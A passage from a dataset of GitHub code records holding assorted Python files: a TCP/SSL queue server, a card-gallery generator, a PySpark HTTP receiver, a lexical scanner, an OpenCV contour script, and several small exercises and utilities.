self.__tcpThread = None\n self.__sslThread = None\n\n def launch_tcp_server(self, host, port):\n # create localhost TCP server on the given port\n self.__tcpServer = SuperQTCPThreadedServer((host, port),\n SuperQStreamHandler)\n\n # handle requests until an explicit shutdown() request\n self.__tcpServer.serve_forever()\n\n def shutdown_tcp_server(self):\n self.__tcpServer.shutdown()\n self.__tcpThread.join()\n\n self.__tcpServer = None\n self.__tcpThread = None\n\n def launch_ssl_server(self, host, port):\n # create localhost SSL server on the given port\n self.__sslServer = SuperQSSLThreadedServer((host, port),\n SuperQStreamHandler,\n DEFAULT_SSL_PEM_FILE,\n DEFAULT_SSL_KEY_FILE,\n ssl_version = PROTOCOL_TLSv1)\n\n # handle requests until an explicit shutdown() request\n self.__sslServer.serve_forever()\n\n def shutdown_ssl_server(self):\n self.__sslServer.shutdown()\n self.__sslThread.join()\n\n self.__sslServer = None\n self.__sslThread = None\n\n def launch_node_mgr(self, tcpPort, sslPort, startSSL):\n log('Starting TCP connection handler ...')\n self.__tcpThread = Thread(target = self.launch_tcp_server,\n args = ('', tcpPort))\n self.__tcpThread.start()\n\n if startSSL:\n log('Starting SSL connection handler ...')\n self.__sslThread = Thread(target = self.launch_ssl_server,\n args = ('', sslPort))\n self.__sslThread.start()\n\n def shutdown_node(self):\n if self.__tcpServer:\n self.shutdown_tcp_server()\n\n if self.__sslServer:\n self.shutdown_ssl_server()\n\ndef main(argv):\n log('Starting superq public node ...')\n\n tcpPort = DEFAULT_TCP_PORT\n sslPort = DEFAULT_SSL_PORT\n\n sslEnabled = False\n\n try:\n opts, args = getopt(argv, 't:s:', ['tcpport=', 'sslport='])\n except GetoptError:\n exit(2)\n\n for opt, arg in opts:\n if opt in ('-t', '--tcpport'):\n tcpPort = arg\n elif opt in ('-s', '--sslport'):\n sslEnabled = True\n sslPort = arg\n\n log('TCP port is {0}'.format(tcpPort))\n\n if (sslEnabled):\n log('SSL port is {0}. '.format(sslPort))\n\n log('Setting internal datastore to public ...')\n _dataStore.set_public()\n\n log('Creating and launching node ...')\n nodeMgr = SuperQNetworkNode()\n nodeMgr.launch_node_mgr(int(tcpPort), int(sslPort), sslEnabled)\n\n log('Cleaning up ...')\n nodeMgr.shutdown_node()\n\n log('Leaving main.')\n\nif __name__ == '__main__':\n main(argv[1:])\n\n# TODO: FEATURES:\n#\n# 1) encryption\n# 2) persistence\n# 3) alteration\n# 4) testing\n# 5) documentation\n\n# 1) I'm only concerned with encryption over the network. Assume individual\n# node system security is handled on an operating system administrative\n# level. Incidentally this makes the problem of querying on an encrypted db\n# go away.\n# Considering currently pulling the ssl implementation out so that security\n# can be cleanly revisited down the road.\n\n# 2) I like maintaining the current datastore-based save/restore. Could be\n# useful for migrating datastores between physical nodes. Or possibly\n# mirroring. It can be treated entirely separately from instance persistence.\n# Instance persistence should be handled simply with a boolean setting that\n# can be passed to the constructor on superq creation or changed dynamically\n# any time after.\n\n# 3) Need to support: add column, remove column, rename column, rename table\n\n# 4) Mainly interested in a performance test suite that can detect scalability\n# issues as well as further synchronization/parallel testing.\n\n# 5) Improve existing architectural and api documentation. Add wire protocol\n# documentation.\n\n# TODO: investigate if superq class should support __add__, __iadd__\n","repo_name":"manesajian/superq","sub_path":"superq.py","file_name":"superq.py","file_ext":"py","file_size_in_byte":95506,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"71799711400","text":"import ujson as json\n\n\ndef build_class_name(name, id):\n name0 = name.replace(\"'\", \"\").replace(\":\", \" \").replace(\"!\", \" \").replace(\",\", \" \").replace(\"-\", \" \")\n name1 = \"\".join([x.capitalize() for x in name0.split(' ')])\n return name1 + \"{0:#0{1}d}\".format(id, 4)\n\n\ndata1 = json.load(open(\"set1-en_us.json\"))\ndata2 = json.load(open(\"set2-en_us.json\"))\ndata = data1 + data2\ncode2id = dict()\nid2classname = dict()\nfor id, item in enumerate(data):\n code2id[item['cardCode']] = id\n id2classname[id] = build_class_name(item['name'], id)\n\n# generate gallery.cc\ngallery_cc = ['''#include \"gallery.h\"\n#include \"initiator.h\"\n#include \"cardset01.cc\"\n#include \"cardset02.cc\"\n''']\nporo_with_1_cost = []\nchampion = dict()\nfor id, item in enumerate(data):\n if item['type'] == 'Unit' and item['supertype'] == 'Champion':\n champion[id] = -1\n if item['subtype'] == 'PORO' and item['cost'] == 1 and item['collectible']:\n poro_with_1_cost.append(id)\nfor id, item in enumerate(data):\n if item['type'] == 'Spell' and item['supertype'] == 'Champion':\n ref = item['associatedCardRefs']\n for code in ref:\n if code2id[code] in champion:\n champion[code2id[code]] = id\ncsp = []\nfor ch in champion:\n csp.append(\"{\" + \"{},{}\".format(ch, champion[ch]) + \"}\")\ngallery_cc.append(\"umap GALLERY;\")\ngallery_cc.append(\"umap COLLECTIBLE;\")\ngallery_cc.append(\"vec DRAVEN = {1, 130};\\n\")\ngallery_cc.append(\"vec PORO_WITH_1_COST = {\" + \",\".join(map(lambda x: str(x), poro_with_1_cost)) + \"};\\n\")\ngallery_cc.append(\"umap CHAMPION_TO_SPELL = {\" + \",\".join(csp) + \"};\")\ngallery_cc.append('''\n\nvoid init_gallery() {\n init_cardset01();\n init_cardset02();\n for (auto p: GALLERY) {\n if (p.second->collectible)\n COLLECTIBLE[p.first] = p.second;\n CODE_TO_CARD[str(p.second->code)] = p.second;\n }\n init01IO049();\n init01SI030();\n init01SI030T2();\n init01NX050();\n}\n\nvoid clear_gallery() {\n for(auto entry: GALLERY){\n delete entry.second;\n }\n GALLERY.clear();\n}\n''')\n\ngf = open(\"../src/cardset/gallery.cc\", 'w')\ngf.writelines(gallery_cc)\n","repo_name":"hengruo/RuneSim","sub_path":"legacy/meta/gen_gallery.py","file_name":"gen_gallery.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"18"} +{"seq_id":"41399103040","text":"# Возвести, введенное с клавиатуры число, в степень n, \n# степень тоже вводится с клавиатуры. \n# Возведение в степень организовать с использованием циклов.\n\nnumber = int(input('Enter number: '))\npower = int(input('Enter power: '))\n\nresult = 1\n\nfor i in range(power):\n result *= number\nprint(result)\n","repo_name":"jonnytaddesky/taskPython","sub_path":"pow.py","file_name":"pow.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"15719593625","text":"# ...Back to Python for now, in the interest of time and my fragile ego\n\nfrom collections import defaultdict\n\nconnections = defaultdict(list) # A dict of lists, mapping each cave to its neighbors\nwith open('input.txt') as input_file:\n for line in input_file:\n first, second = line.rstrip().split('-')\n connections[first].append(second)\n connections[second].append(first)\n\n# Start at 'start' and perform a depth-first-search to find all the valid paths to 'end'\ndef spelunk(current_path: list):\n \"\"\"Return the number of valid complete paths that are found by extending the given path.\"\"\"\n global connections\n\n if current_path[-1] == 'end':\n return 1\n\n count = 0\n for cave in connections[current_path[-1]]:\n if cave == 'start' or cave.islower() and cave in current_path:\n continue\n count += spelunk(current_path + [cave])\n return count\n\nprint(spelunk(['start']))\n","repo_name":"brianfay/aoc-2021","sub_path":"sean/12/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"21713161106","text":"# 윤곽선 찾기 -> 윤곽선을 원 or 타원으로 만듬\n\nimport cv2\nimport numpy as np\n\n# Canny를 위한 외곽선 탐지를 위한 필터.\nlower = 84\nupper = 200\n\n# 테스트할 이미지를 불러오기, img1 으로 불러오기 , img2 으로 복사 , img는 Gray로 변환.\nimg1 = cv2.imread('det.jpg', 1)\nimg2 = img1.copy()\nimg = cv2.cvtColor(img1,cv2.COLOR_BGR2GRAY)\n\n# Blur처리함.\nimg = cv2.GaussianBlur(img,(5, 5),0)\n\n# 외곽선 탐지를 위해 cv2.Canny 함수를 사용. (불러온이미지, min 값, max 값)\nedges = cv2.Canny(img, lower, upper)\n\n# 찾은 영역범위에 외곽선을 그려줌.\ntry:\n _, contours , _= cv2.findContours(edges, cv2.RETR_TREE, 1)\nexcept:\n contours, _ = cv2.findContours(edges, cv2.RETR_TREE, 1)\n\nrep = cv2.drawContours(img1, contours, -1, (0,255,0), 3)\n\n# 외곽선을 원형 형태로 바꾸어줌. (원 또는 타원)\nfor i in range(0, len(contours)):\n ellipse = cv2.fitEllipse(contours[i])\n (center, axes, orientation) = ellipse\n majoraxis_length = max(axes)\n minoraxis_length = min(axes)\n eccentricity=(np.sqrt(1-(minoraxis_length / majoraxis_length)**2))\n cv2.ellipse(img2,ellipse,(0,0,255),2)\n\n# 엣지 검출한것.\ncv2.imshow('Edges', edges )\n# 외곽선 표시한 것.\ncv2.imshow('contours',rep)\n# 타원으로 만든 것.\ncv2.imshow('Detected ellipse', img2)\n\ncv2.waitKey(0)","repo_name":"lyj911111/OpenCV_Project","sub_path":"_testcodes/외곽선을 타원형 또는 원형으로 만들어줌/Contour_TO_circleOrElipse.py","file_name":"Contour_TO_circleOrElipse.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22767237678","text":"# Very simple environment template parser\n# Only substitute name variable to a predermined set of known values from env.json\nimport glob\nimport json\nimport re\nimport sys\nfrom os.path import basename\nfrom os import getenv\n\nvar_pattern = re.compile('{{([^}]+)}}')\nname_pattern = re.compile('[a-z]+[-_a-z0-9]+', re.IGNORECASE)\n\ndef parse(content, data, debug=False): \n r = var_pattern.findall(content)\n for name in r:\n if not name_pattern.match(name):\n raise Exception(\"Variable '%s' is not a good variable name\" % (name))\n if not name in data:\n raise Exception(\"Variable '%s' is not known\" % (name))\n value = data[name]\n var = '{{' + name + '}}'\n if debug:\n print(\"%s : '%s' %s\" % (name, content, value,))\n content = content.replace(var, value)\n if debug:\n print(\" => \"+ content+ \"\\n\")\n \n return content\n\ndef update_template(file, data):\n with open(file, 'r') as f:\n content = f.read()\n f.close()\n try:\n content = parse(content, data)\n except Exception as e:\n print(\"Error in %s %s\" % (file, e))\n return content \n\ndef update_data(data):\n \"\"\"\n Update data to find variables inside\n \"\"\"\n to_update = [] # Find entries needed to be updated\n for name, value in data.items():\n if var_pattern.search(value):\n to_update.append(name)\n for name in to_update:\n data[name] = parse(data[name], data)\n return data \n\ntarget_dir = 'env'\n\nif getenv('ENV_DIR') != \"\":\n target_dir = getenv('ENV_DIR')\n\nif len(sys.argv) > 1:\n target_dir = sys.argv[1]\n\nwith open(target_dir + '/env.json','r') as fp:\n data = json.load(fp)\n fp.close()\n\n# Can use {{ENV_DIR}} to relate to current environment dir\ndata['ENV_DIR'] = target_dir\n\ndata = update_data(data)\n\nwith open(target_dir + '/env.build.json', 'w') as fp:\n json.dump(data, fp)\n fp.close()\n\nprint(\"Building env from %s\" % (target_dir))\ncount = 0\nfor file in glob.glob('templates/*.tpl'):\n target = target_dir+ '/' + basename(file)\n target = target.replace('.tpl', '.env')\n content = update_template(file, data)\n with open(target, 'w+') as f:\n f.write(content)\n f.close()\n count += 1\nprint(\"%d files generated\" % (count, ))","repo_name":"grippenet/cluster-compose-tools","sub_path":"env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41495321740","text":"import json\nimport math\nfrom typing import Any, Dict, List, Optional, cast\n\nfrom more_itertools import chunked\nfrom pyspark import StorageLevel\nfrom pyspark.sql.types import Row\nfrom pyspark.rdd import RDD\nfrom pyspark.sql.functions import col, from_json\nfrom pyspark.sql.types import (\n StructField,\n StringType,\n StructType,\n MapType,\n IntegerType,\n BooleanType,\n)\n\nfrom spark_pipeline_framework.transformers.http_data_receiver.v4.http_data_receiver_processor import (\n HttpDataReceiverProcessor,\n RESPONSE_PROCESSOR_TYPE,\n REQUEST_GENERATOR_TYPE,\n)\nfrom spark_pipeline_framework.utilities.capture_parameters import capture_parameters\nfrom pyspark.ml.param import Param\nfrom pyspark.sql.dataframe import DataFrame\nfrom spark_pipeline_framework.logger.yarn_logger import get_logger\nfrom spark_pipeline_framework.progress_logger.progress_log_metric import (\n ProgressLogMetric,\n)\nfrom spark_pipeline_framework.progress_logger.progress_logger import ProgressLogger\nfrom spark_pipeline_framework.transformers.framework_transformer.v1.framework_transformer import (\n FrameworkTransformer,\n)\nfrom spark_pipeline_framework.utilities.oauth2_helpers.v2.oauth2_client_credentials_flow import (\n OAuth2Credentails,\n)\nfrom spark_pipeline_framework.utilities.spark_data_frame_helpers import (\n create_empty_dataframe,\n)\n\n\nclass HttpDataReceiver(FrameworkTransformer):\n \"\"\"\n This is a generic class to call a http api and return the response\n \"\"\"\n\n # noinspection PyUnusedLocal\n @capture_parameters\n def __init__(\n self,\n name: str,\n success_view: str,\n error_view: str,\n http_request_generator: REQUEST_GENERATOR_TYPE,\n response_processor: RESPONSE_PROCESSOR_TYPE,\n success_schema: Optional[StructType] = None,\n error_schema: Optional[StructType] = None,\n num_partition: Optional[int] = None,\n batch_size: int = 1000,\n items_per_partition: Optional[int] = None,\n cache_storage_level: Optional[StorageLevel] = None,\n credentials: Optional[OAuth2Credentails] = None,\n auth_url: Optional[str] = None,\n parameters: Optional[Dict[str, Any]] = None,\n run_sync: bool = False,\n raise_error: bool = False,\n progress_logger: Optional[ProgressLogger] = None,\n ) -> None:\n \"\"\"\n Transformer to call and receive data from an API\n\n :param name: name of transformer\n :param success_view: name of the view to read the response into\n :param error_view: (Optional) log the details of the api failure into `error_view` view.\n :param http_request_generator: Generator to build next http request\n :param response_processor: it can change the result before loading to spark df\n :param success_schema: Schema for success response\n :param error_schema: Schema for error response\n :param num_partition: Number of batches\n :param batch_size: Size of a partition, used in internal processing like converting requests to view\n :param items_per_partition: Number of items to process per partition\n :param cache_storage_level: (Optional) how to store the cache:\n https://sparkbyexamples.com/spark/spark-dataframe-cache-and-persist-explained/.\n :param credentials: OAuth2 credentails\n :param auth_url: OAuth2 token URL\n :param parameters: parameters\n :param run_sync: process the items linearly\n :param raise_error: (Optional) Raise error in case of api failure\n :param progress_logger: progress logger\n \"\"\"\n super().__init__(\n name=name, parameters=parameters, progress_logger=progress_logger\n )\n\n self.logger = get_logger(__name__)\n\n self.name: Param[str] = Param(self, \"name\", \"\")\n self._setDefault(name=None)\n\n self.success_view: Param[str] = Param(self, \"success_view\", \"\")\n self._setDefault(success_view=None)\n\n self.error_view: Param[str] = Param(self, \"error_view\", \"\")\n self._setDefault(error_view=None)\n\n self.http_request_generator: Param[REQUEST_GENERATOR_TYPE] = Param(\n self, \"http_request_generator\", \"\"\n )\n self._setDefault(http_request_generator=None)\n\n self.response_processor: Param[RESPONSE_PROCESSOR_TYPE] = Param(\n self, \"response_processor\", \"\"\n )\n self._setDefault(response_processor=None)\n\n self.success_schema: Param[Optional[StructType]] = Param(\n self, \"success_schema\", \"\"\n )\n self._setDefault(success_schema=success_schema)\n\n self.error_schema: Param[Optional[StructType]] = Param(self, \"error_schema\", \"\")\n self._setDefault(error_schema=error_schema)\n\n self.num_partition: Param[Optional[int]] = Param(self, \"num_partition\", \"\")\n self._setDefault(num_partition=None)\n\n self.batch_size: Param[int] = Param(self, \"batch_size\", \"\")\n self._setDefault(batch_size=batch_size)\n\n self.items_per_partition: Param[Optional[int]] = Param(\n self, \"items_per_partition\", \"\"\n )\n self._setDefault(items_per_partition=None)\n\n self.cache_storage_level: Param[Optional[StorageLevel]] = Param(\n self, \"cache_storage_level\", \"\"\n )\n self._setDefault(cache_storage_level=None)\n\n self.credentials: Param[Optional[OAuth2Credentails]] = Param(\n self, \"credentials\", \"\"\n )\n self._setDefault(credentials=None)\n\n self.auth_url: Param[Optional[str]] = Param(self, \"auth_url\", \"\")\n self._setDefault(auth_url=None)\n\n self.run_sync: Param[bool] = Param(self, \"run_sync\", \"\")\n self._setDefault(run_sync=run_sync)\n\n self.raise_error: Param[bool] = Param(self, \"raise_error\", \"\")\n self._setDefault(raise_error=raise_error)\n\n kwargs = self._input_kwargs\n self.setParams(**kwargs)\n\n def _transform(self, df: DataFrame) -> DataFrame:\n # Setting the variables\n name: str = self.getOrDefault(self.name)\n success_view: str = self.getOrDefault(self.success_view)\n error_view: str = self.getOrDefault(self.error_view)\n success_schema: Optional[StructType] = self.getOrDefault(self.success_schema)\n error_schema: Optional[StructType] = self.getOrDefault(self.error_schema)\n num_partition: Optional[int] = self.getOrDefault(self.num_partition)\n batch_size: int = self.getOrDefault(self.batch_size)\n items_per_partition: Optional[int] = self.getOrDefault(self.items_per_partition)\n http_request_generator: REQUEST_GENERATOR_TYPE = self.getOrDefault(\n self.http_request_generator\n )\n response_processor: RESPONSE_PROCESSOR_TYPE = self.getOrDefault(\n self.response_processor\n )\n cache_storage_level: Optional[StorageLevel] = self.getOrDefault(\n self.cache_storage_level\n )\n credentials: Optional[OAuth2Credentails] = self.getOrDefault(self.credentials)\n auth_url: Optional[str] = self.getOrDefault(self.auth_url)\n run_sync: bool = self.getOrDefault(self.run_sync)\n raise_error: bool = self.getOrDefault(self.raise_error)\n progress_logger: Optional[ProgressLogger] = self.getProgressLogger()\n\n with ProgressLogMetric(\n name=f\"{name}_http_data_receiver_v4\", progress_logger=progress_logger\n ):\n requests_df: DataFrame = create_empty_dataframe(\n df.sparkSession,\n StructType(\n [\n StructField(\"url\", StringType()),\n StructField(\"headers\", StringType()),\n StructField(\"state\", StringType()),\n ]\n ),\n )\n for requests in chunked(\n http_request_generator(df, progress_logger), batch_size\n ):\n # Create the Dataframe\n view_data = [\n [\n request.url,\n json.dumps(request.headers),\n json.dumps(extra_context),\n ]\n for request, extra_context in requests\n ]\n df_ = df.sparkSession.createDataFrame(\n view_data, [\"url\", \"headers\", \"state\"]\n )\n\n # Append the Dataframe\n requests_df = requests_df.union(df_)\n requests_df.createOrReplaceTempView(\"requests_view\")\n\n desired_partitions: int = self.get_desired_partitions(\n num_partition=num_partition,\n items_per_partition=items_per_partition,\n df=requests_df,\n )\n\n row_schema = StructType(\n [\n StructField(\"headers\", MapType(StringType(), StringType())),\n StructField(\"url\", StringType()),\n StructField(\"status\", IntegerType()),\n StructField(\"is_error\", BooleanType()),\n StructField(\"error_data\", StringType()),\n StructField(\"success_data\", StringType()),\n StructField(\"state\", StringType()),\n ]\n )\n\n if run_sync:\n rows: List[Row] = requests_df.collect()\n result_rows = HttpDataReceiverProcessor.process_rows(\n partition_index=0,\n rows=rows,\n response_processor=response_processor,\n raise_error=raise_error,\n credentials=credentials,\n auth_url=auth_url,\n )\n\n # Create success view\n success = filter(lambda row: not row[\"is_error\"], result_rows)\n df_success: DataFrame = df.sparkSession.createDataFrame(\n [s.asDict(recursive=True) for s in success], schema=row_schema\n )\n json_schema = self.infer_schema_json_string_column(\n df_success, \"success_data\"\n )\n self.copy_and_drop_column(\n df_success, \"success_data\", \"data\", success_view, json_schema\n )\n\n # Create error view\n error = filter(lambda row: row[\"is_error\"], result_rows)\n df_errors: DataFrame = df.sparkSession.createDataFrame(\n [e.asDict(recursive=True) for e in error], schema=row_schema\n )\n json_schema = self.infer_schema_json_string_column(\n df_errors, \"error_data\"\n )\n self.copy_and_drop_column(\n df_errors, \"error_data\", \"data\", error_view, json_schema\n )\n else:\n rdd: RDD[Row] = requests_df.repartition(\n desired_partitions\n ).rdd.mapPartitionsWithIndex(\n lambda partition_index, rows_to_query: HttpDataReceiverProcessor.process_rows(\n partition_index=partition_index,\n rows=rows_to_query,\n response_processor=response_processor,\n raise_error=raise_error,\n credentials=credentials,\n auth_url=auth_url,\n )\n )\n rdd = (\n rdd.cache()\n if cache_storage_level is None\n else rdd.persist(storageLevel=cache_storage_level)\n )\n\n result_df: DataFrame = rdd.toDF(schema=row_schema)\n\n # Create success view\n df_success = result_df.filter(result_df[\"is_error\"] == False)\n json_schema = success_schema or self.infer_schema_json_string_column(\n df_success, \"success_data\"\n )\n self.copy_and_drop_column(\n df_success, \"success_data\", \"data\", success_view, json_schema\n )\n\n # Create error view\n df_errors = result_df.filter(result_df[\"is_error\"] == True)\n json_schema = error_schema or self.infer_schema_json_string_column(\n df_errors, \"error_data\"\n )\n self.copy_and_drop_column(\n df_errors, \"error_data\", \"data\", error_view, json_schema\n )\n\n return df\n\n def infer_schema_json_string_column(self, df: DataFrame, col_: str) -> StructType:\n \"\"\"\n Infer json schema from `col_` column\n\n :param df: Dataframe to be processed.\n :param col_: Source column name\n \"\"\"\n json_schema = df.sparkSession.read.json(\n df.rdd.map(lambda row: cast(str, row[col_]))\n ).schema\n return json_schema\n\n def copy_and_drop_column(\n self, df: DataFrame, col_: str, dest_col: str, view: str, schema: StructType\n ) -> None:\n \"\"\"\n Copy the `col_` column to `dest_col` column with provided schema\n\n :param df: Dataframe to be processed.\n :param col_: source column\n :param dest_col: destination column\n :param view: Name of the view where the dataframe will be saved\n :param schema: schema of the `dest_col` column\n \"\"\"\n df = df.withColumn(dest_col, from_json(col(col_), schema))\n df = df.drop(\"success_data\", \"error_data\", \"is_error\")\n df.createOrReplaceTempView(view)\n\n def get_desired_partitions(\n self,\n *,\n df: DataFrame,\n num_partition: Optional[int] = None,\n items_per_partition: Optional[int] = None,\n ) -> int:\n \"\"\"\n Get the desired partitions based on num_partition, items_per_partition and dataframe\n\n :param num_partition: number of desired partitions\n :param items_per_partition: number of items in a partitions\n :param df: Dataframe which will be divided into partitions\n \"\"\"\n desired_partitions: int\n if num_partition:\n desired_partitions = num_partition\n else:\n row_count: int = df.count()\n desired_partitions = (\n math.ceil(row_count / items_per_partition)\n if items_per_partition and items_per_partition > 0\n else row_count\n ) or 1\n self.logger.info(f\"Total Batches: {desired_partitions}\")\n return desired_partitions\n","repo_name":"icanbwell/SparkPipelineFramework","sub_path":"spark_pipeline_framework/transformers/http_data_receiver/v4/http_data_receiver.py","file_name":"http_data_receiver.py","file_ext":"py","file_size_in_byte":14581,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"18"} +{"seq_id":"70757430439","text":"import SymbolTable\nimport Symbols\nimport re\n\n\nclass Scanner:\n def __init__(self):\n self.__operators = []\n self.__separators = []\n self.__reserved_words = []\n self.PIF = []\n self.ST = SymbolTable.SymbolTable(13)\n self.symbols = Symbols.Symbols()\n\n def check_if_identifier(self, token):\n return re.search('^[a-z]([a-zA-Z])*$', token) is not None\n\n def is_constant(self, token):\n return re.search('^(0|[+-]?[1-9][0-9]*)$|^\\'.\\'$|^\\'.*\\'$', token) is not None\n\n def get_string_token_from_line(self, line, index):\n token = ''\n quotes = 0\n while index < len(line) and quotes < 2:\n if line[index] == '\\'' or line[index] == '\\\"':\n quotes += 1\n token += line[index]\n index += 1\n return token, index\n\n def is_operator(self, c):\n for operator in self.symbols.operators:\n if c in operator:\n return True\n return False\n\n def get_operator_from_token(self, line, index):\n token = ''\n while index < len(line) and self.is_operator(line[index]):\n token += line[index]\n index += 1\n return token, index\n\n def get_tokens(self, line):\n token = ''\n tokens = []\n i = 0\n while i < len(line):\n if self.is_operator(line[i]):\n if token:\n tokens.append(token)\n token, i = self.get_operator_from_token(line, i)\n tokens.append(token)\n token = ''\n elif line[i] == '\\'' or line[i] == '\\\"':\n if token:\n tokens.append(token)\n token, i = self.get_string_token_from_line(line, i)\n tokens.append(token)\n token = ''\n elif line[i] in self.symbols.separators or line[i] == ' ':\n if token:\n tokens.append(token)\n token = line[i]\n i += 1\n tokens.append(token)\n token = ''\n else:\n token += line[i]\n i += 1\n if token:\n tokens.append(token)\n return tokens\n\n def read_from_file(self, file):\n f = open(file, \"r\")\n error = \"\"\n line_counter = 0\n for line in f:\n line_counter += 1\n tokens = self.get_tokens(line.strip())\n # print(tokens)\n for i in range(len(tokens)):\n if tokens[i][0] == \"\\'\" and tokens[i][len(tokens[i]) - 1] == \"\\'\":\n self.PIF.append((\"string\", 0))\n elif tokens[i][0] == \"\\\"\" and tokens[i][len(tokens[i]) - 1] == \"\\\"\":\n self.PIF.append((\"string\", 0))\n elif tokens[i] in self.symbols.reserved_words + self.symbols.separators + self.symbols.operators or \\\n tokens[i] == ' ':\n if tokens[i] == ' ':\n continue\n self.PIF.append((tokens[i], 0))\n elif self.check_if_identifier(tokens[i]):\n id1 = self.ST.add(tokens[i])\n self.PIF.append((\"id\", id1))\n elif self.is_constant(tokens[i]):\n const = self.ST.add(str(tokens[i]))\n self.PIF.append((\"const\", const))\n else:\n error += 'Lexical error at line ' + str(line_counter) + \" -> \" + tokens[i] + \"\\n\"\n wpif = open(\"PIF.out\", \"a\")\n wpif.write(self.PIF_string())\n wst = open(\"ST.out\", \"a\")\n wst.write(str(self.ST))\n if error == '':\n print(\"The program is lexically correct!\")\n else:\n print(error)\n\n def PIF_string(self):\n s = \"\"\n for i in self.PIF:\n s += str(i[0]) + \" \" + str(i[1]) + '\\n'\n return s\n\n def print_symbols(self):\n print(\"SEPARATORS: \", self.symbols.separators)\n print(\"-----\")\n print(\"OPERATORS: \", self.symbols.operators)\n print(\"-----\")\n print(\"RESERVED WORDS: \", self.symbols.reserved_words)\n","repo_name":"917OctaviaSuceava/FLCD","sub_path":"lab3/Scanner.py","file_name":"Scanner.py","file_ext":"py","file_size_in_byte":4150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70924732519","text":"# ----------------------------------------------------------------- #\n# #\n# Parity plot generation unit #\n# #\n# This unit generates a parity plot based on the known values #\n# in the training data, and the predicted values generated #\n# using the training data. #\n# #\n# Because this metric compares predictions versus a ground truth, #\n# it doesn't make sense to generate the plot when a predict #\n# workflow is being run (because in that case, we generally don't #\n# know the ground truth for the values being predicted). Hence, #\n# this unit does nothing if the workflow is in \"predict\" mode. #\n# ----------------------------------------------------------------- #\n\n\nimport matplotlib.pyplot as plt\n\nimport settings\n\nwith settings.context as context:\n # Train\n if settings.is_workflow_running_to_train:\n # Restore the data\n train_target = context.load(\"train_target\")\n train_predictions = context.load(\"train_predictions\")\n test_target = context.load(\"test_target\")\n test_predictions = context.load(\"test_predictions\")\n\n # Un-transform the data\n target_scaler = context.load(\"target_scaler\")\n train_target = target_scaler.inverse_transform(train_target)\n train_predictions = target_scaler.inverse_transform(train_predictions)\n test_target = target_scaler.inverse_transform(test_target)\n test_predictions = target_scaler.inverse_transform(test_predictions)\n\n # Plot the data\n plt.scatter(train_target, train_predictions, c=\"#203d78\", label=\"Training Set\")\n if settings.is_using_train_test_split:\n plt.scatter(test_target, test_predictions, c=\"#67ac5b\", label=\"Testing Set\")\n plt.xlabel(\"Actual Value\")\n plt.ylabel(\"Predicted Value\")\n\n # Scale the plot\n target_range = (min(min(train_target), min(test_target)),\n max(max(train_target), max(test_target)))\n predictions_range = (min(min(train_predictions), min(test_predictions)),\n max(max(train_predictions), max(test_predictions)))\n\n limits = (min(min(target_range), min(target_range)),\n max(max(predictions_range), max(predictions_range)))\n plt.xlim = (limits[0], limits[1])\n plt.ylim = (limits[0], limits[1])\n\n # Draw a parity line, as a guide to the eye\n plt.plot((limits[0], limits[1]), (limits[0], limits[1]), c=\"black\", linestyle=\"dotted\", label=\"Parity\")\n plt.legend()\n\n # Save the figure\n plt.tight_layout()\n plt.savefig(\"my_parity_plot.png\", dpi=600)\n\n # Predict\n else:\n # It might not make as much sense to draw a plot when predicting...\n pass\n","repo_name":"Exabyte-io/application-flavors","sub_path":"assets/python/ml/pyml:post_processing:parity_plot:matplotlib.pyi","file_name":"pyml:post_processing:parity_plot:matplotlib.pyi","file_ext":"pyi","file_size_in_byte":3018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"35780868662","text":"# 골드 2\n\nimport sys\nfrom heapq import heappop, heappush\n\ninput = sys.stdin.readline\n\n\ndef typology_sort():\n result = []\n heap = [i for i in range(1, n + 1) if in_degree[i] == 0]\n\n while heap:\n node = heappop(heap)\n result.append(node)\n for next_node in graph[node]:\n in_degree[next_node] -= 1\n if in_degree[next_node] == 0:\n heappush(heap, next_node)\n\n return result\n\n\nn, m = map(int, input().split())\ngraph = [[] for _ in range(n + 1)]\nin_degree = [0] * (n + 1)\n\nfor _ in range(m):\n a, b = map(int, input().split())\n graph[a].append(b)\n in_degree[b] += 1\n\nprint(*typology_sort())\n","repo_name":"what-the-study/what-the-algorithm","sub_path":"youngjoo/BOJ/Topological_Sort/1766_문제집.py","file_name":"1766_문제집.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71010851559","text":"from flask import (Response as ResponseBase, \n redirect\n )\nfrom flask.json import dumps\nfrom ..datastructures import NCObject\nimport typing as t\n\ndef JsonResponse(*wargs, **kwargs) -> ResponseBase: \n \"\"\"\n Returns the Jsonified object.\n\n :for example::\n \n from navycut.http import JsonResponse\n class CustomView(MethodView):\n def get(self):\n return JsonResponse(message=\"Salve Mundi!\")\n \"\"\"\n if len(wargs) and isinstance(wargs[0], NCObject): \n return ResponseBase(dumps(wargs[0].to_dict()), mimetype='application/json')\n \n return ResponseBase(dumps(wargs[0]), mimetype='application/json') if len(wargs) else ResponseBase(dumps(kwargs), mimetype='application/json')\n\n\ndef HttpResponse(*wargs, **kwargs) -> t.Type[ResponseBase]:\n return ResponseBase(*wargs, **kwargs)\n\ndef HTTPRedirect(location:str, \n code:int, \n response:t.Optional[t.Type[ResponseBase]]=None\n ) -> t.Type[ResponseBase]:\n \"\"\"\n Redirect to the specified location.\n\n :param location:\n the location where you want to redirect.\n :param code:\n the web status code. Default if 302.\n\n example::\n\n from navycut.http import HTTPRedirect\n\n def home(req, res):\n return 